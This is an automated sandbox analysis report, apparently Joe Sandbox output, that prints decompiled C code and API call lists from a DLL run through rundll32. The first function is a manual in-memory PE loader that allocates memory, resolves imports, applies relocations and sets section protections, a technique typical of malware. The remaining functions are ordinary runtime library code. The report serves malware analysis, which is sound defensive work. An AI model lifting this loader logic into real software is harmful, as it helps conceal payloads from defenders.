                                                                                                        																	 *_t135 =  *_t135 + _t217;
                                                                                                        																	__eflags =  *_t135;
                                                                                                        																}
                                                                                                        															} else {
                                                                                                        																 *((_t133 & 0x00000fff) + _t196) =  *((_t133 & 0x00000fff) + _t196) + (_t217 >> 0x10);
                                                                                                        															}
                                                                                                        														} else {
                                                                                                        															 *((_t133 & 0x00000fff) + _t196) =  *((_t133 & 0x00000fff) + _t196) + _t217;
                                                                                                        														}
                                                                                                        													} else {
                                                                                                        														 *((_t133 & 0x00000fff) + _t196) =  *((_t133 & 0x00000fff) + _t196) + _t217;
                                                                                                        													}
                                                                                                        													_t156 =  &(_t156[1]);
                                                                                                        													__eflags = _t207;
                                                                                                        												} while (_t207 != 0);
                                                                                                        											}
                                                                                                        											_t232 = _t232 +  *(_t232 + 4);
                                                                                                        											_t132 =  *(_t232 + 4);
                                                                                                        											__eflags = _t132;
                                                                                                        										} while (_t132 != 0);
                                                                                                        										_t190 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                        									}
                                                                                                        								}
                                                                                                        								_t163 =  *(_t190 + 6) & 0x0000ffff;
                                                                                                        								__eflags = _t163;
                                                                                                        								_t120 = ( *(_t190 + 0x14) & 0x0000ffff) + _t190 + 0x18;
                                                                                                        								if(_t163 == 0) {
                                                                                                        									L70:
                                                                                                        									_t219 =  *((intOrPtr*)(_t190 + 0x28)) +  *(_t234 + 0x10);
                                                                                                        									__eflags = _t219;
                                                                                                        									 *((intOrPtr*)(_t234 + 0x40))(0xffffffff, 0, 0);
                                                                                                        									 *_t219(0x10000000, 1, 1);
                                                                                                        									return  *(_t234 + 0x10);
                                                                                                        								} else {
                                                                                                        									_t205 =  *(_t234 + 0x34);
                                                                                                        									_t230 = _t120 + 0x24;
                                                                                                        									do {
                                                                                                        										_t155 =  *(_t230 - 0x14);
                                                                                                        										_t163 = _t163 - 1;
                                                                                                        										__eflags = _t155;
                                                                                                        										 *(_t234 + 0x28) = _t163;
                                                                                                        										if(_t155 <= 0) {
                                                                                                        											goto L69;
                                                                                                        										} else {
                                                                                                        											_t220 =  *_t230;
                                                                                                        											_t193 = _t220 >> 0x0000001e & 0x00000001;
                                                                                                        											_t125 = _t220 >> 0x1f;
                                                                                                        											__eflags = _t220 >> 0x0000001d & 0x00000001;
                                                                                                        											if((_t220 >> 0x0000001d & 0x00000001) != 0) {
                                                                                                        												__eflags = _t193;
                                                                                                        												if(_t193 != 0) {
                                                                                                        													L60:
                                                                                                        													__eflags = _t125;
                                                                                                        													if(_t125 != 0) {
                                                                                                        														goto L62;
                                                                                                        													} else {
                                                                                                        														_t205 = 0x20;
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													__eflags = _t125;
                                                                                                        													if(_t125 != 0) {
                                                                                                        														__eflags = _t193;
                                                                                                        														if(_t193 != 0) {
                                                                                                        															goto L60;
                                                                                                        														} else {
                                                                                                        															__eflags = _t125;
                                                                                                        															if(_t125 == 0) {
                                                                                                        																L62:
                                                                                                        																__eflags = _t193;
                                                                                                        																if(_t193 != 0) {
                                                                                                        																	__eflags = _t125;
                                                                                                        																	if(_t125 != 0) {
                                                                                                        																		_t205 = 0x40;
                                                                                                        																	}
                                                                                                        																}
                                                                                                        															} else {
                                                                                                        																_t205 = 0x80;
                                                                                                        															}
                                                                                                        														}
                                                                                                        													} else {
                                                                                                        														_t205 = 0x10;
                                                                                                        													}
                                                                                                        												}
                                                                                                        											} else {
                                                                                                        												__eflags = _t193;
                                                                                                        												if(_t193 != 0) {
                                                                                                        													__eflags = _t125;
                                                                                                        													_t205 = (0 | _t125 != 0x00000000) + (0 | _t125 != 0x00000000) + 2;
                                                                                                        												} else {
                                                                                                        													asm("sbb eax, eax");
                                                                                                        													_t205 = ( ~_t125 & 0x00000007) + 1;
                                                                                                        												}
                                                                                                        											}
                                                                                                        											__eflags = _t220 & 0x04000000;
                                                                                                        											if((_t220 & 0x04000000) != 0) {
                                                                                                        												_t205 = _t205 | 0x00000200;
                                                                                                        												__eflags = _t205;
                                                                                                        											}
                                                                                                        											_t128 = VirtualProtect( *((intOrPtr*)(_t230 - 0x18)) +  *(_t234 + 0x10), _t155, _t205, _t234 + 0x2c);
                                                                                                        											__eflags = _t128;
                                                                                                        											if(_t128 == 0) {
                                                                                                        												goto L1;
                                                                                                        											} else {
                                                                                                        												_t190 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                        												_t163 =  *(_t234 + 0x28);
                                                                                                        												goto L69;
                                                                                                        											}
                                                                                                        										}
                                                                                                        										goto L71;
                                                                                                        										L69:
                                                                                                        										_t230 =  &(_t230[0xa]);
                                                                                                        										__eflags = _t163;
                                                                                                        									} while (_t163 != 0);
                                                                                                        									goto L70;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				L71:
                                                                                                        			}

                                                                                                        0x10002b47
                                                                                                        0x10002b4b
                                                                                                        0x10002b4e
                                                                                                        0x10002b52
                                                                                                        0x10002b5f
                                                                                                        0x10002b63
                                                                                                        0x10002b70
                                                                                                        0x10002b74
                                                                                                        0x10002b87
                                                                                                        0x10002b8b
                                                                                                        0x10002b92
                                                                                                        0x10002b94
                                                                                                        0x10002b94
                                                                                                        0x10002b94
                                                                                                        0x10002b76
                                                                                                        0x10002b82
                                                                                                        0x10002b82
                                                                                                        0x10002b65
                                                                                                        0x10002b6c
                                                                                                        0x10002b6c
                                                                                                        0x10002b54
                                                                                                        0x10002b5b
                                                                                                        0x10002b5b
                                                                                                        0x10002b97
                                                                                                        0x10002b9a
                                                                                                        0x10002b9a
                                                                                                        0x10002b41
                                                                                                        0x10002b9e
                                                                                                        0x10002ba1
                                                                                                        0x10002ba4
                                                                                                        0x10002ba4
                                                                                                        0x10002ba8
                                                                                                        0x10002ba8
                                                                                                        0x10002b29
                                                                                                        0x10002bac
                                                                                                        0x10002bb0
                                                                                                        0x10002bb6
                                                                                                        0x10002bba
                                                                                                        0x10002c88
                                                                                                        0x10002c8b
                                                                                                        0x10002c8b
                                                                                                        0x10002c95
                                                                                                        0x10002ca2
                                                                                                        0x10002caf
                                                                                                        0x10002bc0
                                                                                                        0x10002bc0
                                                                                                        0x10002bc4
                                                                                                        0x10002bc7
                                                                                                        0x10002bc7
                                                                                                        0x10002bca
                                                                                                        0x10002bcd
                                                                                                        0x10002bcf
                                                                                                        0x10002bd3
                                                                                                        0x00000000
                                                                                                        0x10002bd9
                                                                                                        0x10002bd9
                                                                                                        0x10002beb
                                                                                                        0x10002bee
                                                                                                        0x10002bf1
                                                                                                        0x10002bf3
                                                                                                        0x10002c16
                                                                                                        0x10002c18
                                                                                                        0x10002c34
                                                                                                        0x10002c34
                                                                                                        0x10002c36
                                                                                                        0x00000000
                                                                                                        0x10002c38
                                                                                                        0x10002c38
                                                                                                        0x10002c38
                                                                                                        0x10002c1a
                                                                                                        0x10002c1a
                                                                                                        0x10002c1c
                                                                                                        0x10002c25
                                                                                                        0x10002c27
                                                                                                        0x00000000
                                                                                                        0x10002c29
                                                                                                        0x10002c29
                                                                                                        0x10002c2b
                                                                                                        0x10002c3f
                                                                                                        0x10002c3f
                                                                                                        0x10002c41
                                                                                                        0x10002c43
                                                                                                        0x10002c45
                                                                                                        0x10002c47
                                                                                                        0x10002c47
                                                                                                        0x10002c45
                                                                                                        0x10002c2d
                                                                                                        0x10002c2d
                                                                                                        0x10002c2d
                                                                                                        0x10002c2b
                                                                                                        0x10002c1e
                                                                                                        0x10002c1e
                                                                                                        0x10002c1e
                                                                                                        0x10002c1c
                                                                                                        0x10002bf5
                                                                                                        0x10002bf5
                                                                                                        0x10002bf7
                                                                                                        0x10002c09
                                                                                                        0x10002c12
                                                                                                        0x10002bf9
                                                                                                        0x10002bfb
                                                                                                        0x10002c03
                                                                                                        0x10002c03
                                                                                                        0x10002bf7
                                                                                                        0x10002c4c
                                                                                                        0x10002c52
                                                                                                        0x10002c54
                                                                                                        0x10002c54
                                                                                                        0x10002c54
                                                                                                        0x10002c69
                                                                                                        0x10002c6d
                                                                                                        0x10002c6f
                                                                                                        0x00000000
                                                                                                        0x10002c75
                                                                                                        0x10002c75
                                                                                                        0x10002c79
                                                                                                        0x00000000
                                                                                                        0x10002c79
                                                                                                        0x10002c6f
                                                                                                        0x00000000
                                                                                                        0x10002c7d
                                                                                                        0x10002c7d
                                                                                                        0x10002c80
                                                                                                        0x10002c80
                                                                                                        0x00000000
                                                                                                        0x10002bc7
                                                                                                        0x10002bba
                                                                                                        0x100029fa
                                                                                                        0x10002992
                                                                                                        0x1000297a
                                                                                                        0x1000297a
                                                                                                        0x10002980
                                                                                                        0x10002980
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 100029DC
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,00000000,00000000,00000000,00000000), ref: 10002A0A
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 10002A99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocInfoLibraryLoadNativeSystemVirtual
                                                                                                        • String ID: GetNativeSystemInfo$GetProcAddress$LoadLibraryA$NtFlushInstructionCache$VirtualAlloc$VirtualProtect
                                                                                                        • API String ID: 196127654-3342707224
                                                                                                        • Opcode ID: 301a059bc2bc549d91de6fb12f0b4ffd068ff99313271a0feb3f060f1b4fde81
                                                                                                        • Instruction ID: 5dfb657671d6fbadb05f0bb2e96f667a8f58e6f7ebcf66257c9475c971616111
                                                                                                        • Opcode Fuzzy Hash: 301a059bc2bc549d91de6fb12f0b4ffd068ff99313271a0feb3f060f1b4fde81
                                                                                                        • Instruction Fuzzy Hash: 6EC1C072A043478BE714CF14C880B6AB7E1FF84398F1A462CE9859B749EB34ED45CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E10029DCE() {
                                                                                                        				struct _CRITICAL_SECTION* _v4;
                                                                                                        				char _v28;
                                                                                                        				char _v36;
                                                                                                        				char _v44;
                                                                                                        				intOrPtr _v56;
                                                                                                        				void* __ebx;
                                                                                                        				intOrPtr __ecx;
                                                                                                        				signed int __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct _CRITICAL_SECTION* _t39;
                                                                                                        				intOrPtr _t40;
                                                                                                        				void* _t41;
                                                                                                        				long _t44;
                                                                                                        				void* _t45;
                                                                                                        				intOrPtr _t64;
                                                                                                        				long _t68;
                                                                                                        				void* _t69;
                                                                                                        				void* _t70;
                                                                                                        				void* _t72;
                                                                                                        				intOrPtr _t78;
                                                                                                        				signed char* _t81;
                                                                                                        				signed int _t83;
                                                                                                        				void* _t87;
                                                                                                        				signed int _t89;
                                                                                                        				void* _t91;
                                                                                                        				void* _t92;
                                                                                                        				void* _t94;
                                                                                                        
                                                                                                        				_push(_t72);
                                                                                                        				_push(_t69);
                                                                                                        				_push(_t89);
                                                                                                        				_t87 = _t72;
                                                                                                        				_t1 = _t87 + 0x1c; // 0x10099188
                                                                                                        				_t39 = _t1;
                                                                                                        				_v4 = _t39;
                                                                                                        				EnterCriticalSection(_t39);
                                                                                                        				_t3 = _t87 + 4; // 0x20
                                                                                                        				_t40 =  *_t3;
                                                                                                        				_t4 = _t87 + 8; // 0x3
                                                                                                        				_t83 =  *_t4;
                                                                                                        				if(_t83 >= _t40) {
                                                                                                        					L7:
                                                                                                        					_t83 = 1;
                                                                                                        					if(_t40 <= 1) {
                                                                                                        						L12:
                                                                                                        						_t21 = _t40 + 0x20; // 0x40
                                                                                                        						_t89 = _t21;
                                                                                                        						_t22 = _t87 + 0x10; // 0x26a1718
                                                                                                        						_t41 =  *_t22;
                                                                                                        						if(_t41 != 0) {
                                                                                                        							_t69 = GlobalHandle(_t41);
                                                                                                        							GlobalUnlock(_t69);
                                                                                                        							_t44 = E10001FC0(_t89, 8);
                                                                                                        							_t72 = 0x2002;
                                                                                                        							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                                                                        						} else {
                                                                                                        							_t68 = E10001FC0(_t89, 8);
                                                                                                        							_pop(_t72);
                                                                                                        							_t45 = GlobalAlloc(2, _t68); // executed
                                                                                                        						}
                                                                                                        						if(_t45 != 0) {
                                                                                                        							_t70 = GlobalLock(_t45);
                                                                                                        							_t25 = _t87 + 4; // 0x20
                                                                                                        							E1003E9B0(_t83, _t70 +  *_t25 * 8, 0, _t89 -  *_t25 << 3);
                                                                                                        							 *(_t87 + 4) = _t89;
                                                                                                        							 *(_t87 + 0x10) = _t70;
                                                                                                        							goto L20;
                                                                                                        						} else {
                                                                                                        							_t23 = _t87 + 0x10; // 0x26a1718
                                                                                                        							_t87 =  *_t23;
                                                                                                        							if(_t87 != 0) {
                                                                                                        								GlobalLock(GlobalHandle(_t87));
                                                                                                        							}
                                                                                                        							LeaveCriticalSection(_v4);
                                                                                                        							_push(_t89);
                                                                                                        							_t91 = _t94;
                                                                                                        							_push(_t72);
                                                                                                        							_v28 = 0x100711c0;
                                                                                                        							E1003EF44( &_v28, 0x1006718c);
                                                                                                        							asm("int3");
                                                                                                        							_push(_t91);
                                                                                                        							_t92 = _t94;
                                                                                                        							_push(_t72);
                                                                                                        							_v36 = 0x10071258;
                                                                                                        							E1003EF44( &_v36, 0x10067240);
                                                                                                        							asm("int3");
                                                                                                        							_push(_t92);
                                                                                                        							_push(_t72);
                                                                                                        							_v44 = 0x100712f0;
                                                                                                        							E1003EF44( &_v44, 0x10067284);
                                                                                                        							asm("int3");
                                                                                                        							_push(4);
                                                                                                        							E1003EE82(0x10052ebc, _t69, _t83, _t87);
                                                                                                        							_t78 = E10029C33(0x104);
                                                                                                        							_v56 = _t78;
                                                                                                        							_t64 = 0;
                                                                                                        							_v44 = 0;
                                                                                                        							if(_t78 != 0) {
                                                                                                        								_t64 = E1000A475(_t78);
                                                                                                        							}
                                                                                                        							return E1003EF21(_t64);
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t18 = _t87 + 0x10; // 0x26a1718
                                                                                                        						_t81 =  *_t18 + 8;
                                                                                                        						while(( *_t81 & 0x00000001) != 0) {
                                                                                                        							_t83 = _t83 + 1;
                                                                                                        							_t81 =  &(_t81[8]);
                                                                                                        							if(_t83 < _t40) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						if(_t83 < _t40) {
                                                                                                        							goto L20;
                                                                                                        						} else {
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t13 = __esi + 0x10; // 0x26a1718
                                                                                                        					__ecx =  *_t13;
                                                                                                        					if(( *( *_t13 + __edi * 8) & 0x00000001) == 0) {
                                                                                                        						L20:
                                                                                                        						_t30 = _t87 + 0xc; // 0x3
                                                                                                        						if(_t83 >=  *_t30) {
                                                                                                        							_t31 = _t83 + 1; // 0x4
                                                                                                        							 *((intOrPtr*)(_t87 + 0xc)) = _t31;
                                                                                                        						}
                                                                                                        						_t33 = _t87 + 0x10; // 0x26a1718
                                                                                                        						 *( *_t33 + _t83 * 8) =  *( *_t33 + _t83 * 8) | 0x00000001;
                                                                                                        						_t37 = _t83 + 1; // 0x4
                                                                                                        						 *(_t87 + 8) = _t37;
                                                                                                        						LeaveCriticalSection(_v4);
                                                                                                        						return _t83;
                                                                                                        					} else {
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(10099188,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A), ref: 10029DDD
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 10029E33
                                                                                                        • GlobalHandle.KERNEL32(026A1718), ref: 10029E3C
                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A), ref: 10029E45
                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 10029E5C
                                                                                                        • GlobalHandle.KERNEL32(026A1718), ref: 10029E6E
                                                                                                        • GlobalLock.KERNEL32 ref: 10029E75
                                                                                                        • LeaveCriticalSection.KERNEL32(B5E27FEF,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A), ref: 10029E7F
                                                                                                        • GlobalLock.KERNEL32 ref: 10029E8B
                                                                                                        • _memset.LIBCMT ref: 10029EA4
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10029ED0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 496899490-0
                                                                                                        • Opcode ID: e2aeb4303e6fe52247b775f063a3b6ab890ff9ea92d409991ce17d9e381b7827
                                                                                                        • Instruction ID: fc4797414a7a394abe34cb63a57ca90e538edf77d8d5bd3693ebf12f50f76edf
                                                                                                        • Opcode Fuzzy Hash: e2aeb4303e6fe52247b775f063a3b6ab890ff9ea92d409991ce17d9e381b7827
                                                                                                        • Instruction Fuzzy Hash: 3C319C752047069FE720CF34DC99A2A7BE8FF44681B02491DF897D3661EB70F9058B50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 156 100406d8-100406f6 HeapCreate 157 100406f8-100406fa 156->157 158 100406fb-10040708 call 1004067d 156->158 161 1004072e-10040731 158->161 162 1004070a-10040717 call 1004094d 158->162 162->161 165 10040719-1004072c HeapDestroy 162->165 165->157
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100406D8(intOrPtr _a4) {
                                                                                                        				void* _t6;
                                                                                                        				intOrPtr _t7;
                                                                                                        				void* _t10;
                                                                                                        
                                                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                        				 *0x100995ac = _t6;
                                                                                                        				if(_t6 != 0) {
                                                                                                        					_t7 = E1004067D(__eflags);
                                                                                                        					__eflags = _t7 - 3;
                                                                                                        					 *0x1009b238 = _t7;
                                                                                                        					if(_t7 != 3) {
                                                                                                        						L5:
                                                                                                        						__eflags = 1;
                                                                                                        						return 1;
                                                                                                        					} else {
                                                                                                        						_t10 = E1004094D(0x3f8);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 != 0) {
                                                                                                        							goto L5;
                                                                                                        						} else {
                                                                                                        							HeapDestroy( *0x100995ac);
                                                                                                        							 *0x100995ac =  *0x100995ac & 0x00000000;
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,1003D0E6,00000001,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C), ref: 100406E9
                                                                                                        • HeapDestroy.KERNEL32(?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 1004071F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$CreateDestroy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3296620671-0
                                                                                                        • Opcode ID: fc15cafa63722a51272e878c9444c5ba9ecdfe2bbf2f12e2b4a5d471ec9b3ef9
                                                                                                        • Instruction ID: 8de98cd73fa4535f22ee3f226b1f784cd58f7746bd9e7295e4b6b8749b6881f3
                                                                                                        • Opcode Fuzzy Hash: fc15cafa63722a51272e878c9444c5ba9ecdfe2bbf2f12e2b4a5d471ec9b3ef9
                                                                                                        • Instruction Fuzzy Hash: 5FE02234A463139EFB45CB34CD8531A36DCE7406CAF32483AF809E50A0EB7185809F0C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 166 10040028-1004002e call 1003ff49 168 10040033-10040036 166->168
                                                                                                        C-Code - Quality: 25%
                                                                                                        			E10040028() {
                                                                                                        				void* _t1;
                                                                                                        				void* _t2;
                                                                                                        				void* _t3;
                                                                                                        				void* _t4;
                                                                                                        				void* _t7;
                                                                                                        
                                                                                                        				_push(1);
                                                                                                        				_push(0);
                                                                                                        				_push(0); // executed
                                                                                                        				_t1 = E1003FF49(_t2, _t3, _t4, _t7); // executed
                                                                                                        				return _t1;
                                                                                                        			}









                                                                                                        APIs
                                                                                                        • _doexit.LIBCMT ref: 1004002E
                                                                                                          • Part of subcall function 1003FF49: __lock.LIBCMT ref: 1003FF57
                                                                                                          • Part of subcall function 1003FF49: __decode_pointer.LIBCMT ref: 1003FF86
                                                                                                          • Part of subcall function 1003FF49: __decode_pointer.LIBCMT ref: 1003FF93
                                                                                                        Similarity
                                                                                                        • API ID: __decode_pointer$__lock_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 3276244213-0
                                                                                                        • Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                        • Instruction ID: 99ae952869dd9241ed27fa9eb1e3c4814b4a6aeda98446bde58ca606ff6aa815
                                                                                                        • Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                        • Instruction Fuzzy Hash: 6DA00269BD830029F8B191A12C43F6521015B51F02FD400A4BF482C1C1E4C662584057
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 403 10046c52-10046c68 404 10046c6f-1004706a call 1004a54c * 44 403->404 405 10046c6a-10046c6e 403->405
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: ___getlocaleinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 1937885557-0
                                                                                                        • Opcode ID: 1a586a6a90acfa8746b8b9e095387add2103ae525ea71c5441678218ba0f473b
                                                                                                        • Instruction ID: 999963b8eae7cc5fe2c4e7e3e25b552b5d28efb8de085f77b8a6fedbf883e9bf
                                                                                                        • Opcode Fuzzy Hash: 1a586a6a90acfa8746b8b9e095387add2103ae525ea71c5441678218ba0f473b
                                                                                                        • Instruction Fuzzy Hash: 37E1F3B2D0060DBEEF11CAF1CD81EFF77BDEB48744F14092AB255D2041EA71AA459B64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1000A0F4(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t54;
                                                                                                        				void* _t58;
                                                                                                        				signed int _t59;
                                                                                                        				signed int _t63;
                                                                                                        				signed short _t71;
                                                                                                        				signed int _t84;
                                                                                                        				void* _t94;
                                                                                                        				struct HINSTANCE__* _t96;
                                                                                                        				signed int _t97;
                                                                                                        				void* _t98;
                                                                                                        				signed int _t100;
                                                                                                        				void* _t101;
                                                                                                        				void* _t102;
                                                                                                        
                                                                                                        				_t102 = __eflags;
                                                                                                        				_t94 = __edx;
                                                                                                        				_push(0x24);
                                                                                                        				E1003EEB5(0x10053117, __ebx, __edi, __esi);
                                                                                                        				_t100 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                                                                        				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                                                                        				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                                                                        				_t54 = E1000AB19(__ebx, __edi, __ecx, _t102);
                                                                                                        				_t96 =  *(_t54 + 0xc);
                                                                                                        				_t84 = 0;
                                                                                                        				_t103 =  *(_t100 + 0x58);
                                                                                                        				if( *(_t100 + 0x58) != 0) {
                                                                                                        					_t96 =  *(E1000AB19(0, _t96, _t100, _t103) + 0xc);
                                                                                                        					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                                                                        					 *(_t101 - 0x18) = _t54;
                                                                                                        				}
                                                                                                        				if( *(_t101 - 0x18) != _t84) {
                                                                                                        					_t54 = LockResource( *(_t101 - 0x18));
                                                                                                        					 *(_t101 - 0x1c) = _t54;
                                                                                                        				}
                                                                                                        				if( *(_t101 - 0x1c) != _t84) {
                                                                                                        					_t86 = _t100;
                                                                                                        					 *(_t101 - 0x14) = E10009C4E(_t84, _t100, __eflags);
                                                                                                        					E1000E68D(_t84, _t96, __eflags);
                                                                                                        					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                                                                        					__eflags =  *(_t101 - 0x14) - _t84;
                                                                                                        					 *(_t101 - 0x2c) = _t84;
                                                                                                        					 *(_t101 - 0x24) = _t84;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                                                                        						if(__eflags != 0) {
                                                                                                        							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                                                                        							if(__eflags != 0) {
                                                                                                        								EnableWindow( *(_t101 - 0x14), 0);
                                                                                                        								 *(_t101 - 0x2c) = 1;
                                                                                                        								_t84 = E10009B1B();
                                                                                                        								__eflags = _t84;
                                                                                                        								 *(_t101 - 0x24) = _t84;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_t86 = _t84;
                                                                                                        									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                                                                        									if(__eflags != 0) {
                                                                                                        										_t86 = _t84;
                                                                                                        										__eflags = E1001175A(_t84);
                                                                                                        										if(__eflags != 0) {
                                                                                                        											_t86 = _t84;
                                                                                                        											E10011775(_t84, 0);
                                                                                                        											 *(_t101 - 0x28) = 1;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                        					E1001034E(_t96, __eflags, _t100);
                                                                                                        					_t58 = E1000E5E5(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                                                                        					_push(_t96);
                                                                                                        					_push(_t58);
                                                                                                        					_push( *(_t101 - 0x1c));
                                                                                                        					_t59 = E10009F04(_t84, _t100, _t94, _t96, _t100, __eflags);
                                                                                                        					_t97 = 0;
                                                                                                        					__eflags = _t59;
                                                                                                        					if(_t59 != 0) {
                                                                                                        						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                                                                        						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                                                                        							_t98 = 4;
                                                                                                        							_t71 = E10011632(_t100);
                                                                                                        							__eflags = _t71 & 0x00000100;
                                                                                                        							if((_t71 & 0x00000100) != 0) {
                                                                                                        								_t98 = 5;
                                                                                                        							}
                                                                                                        							E1000E17B(_t100, _t98);
                                                                                                        							_t97 = 0;
                                                                                                        							__eflags = 0;
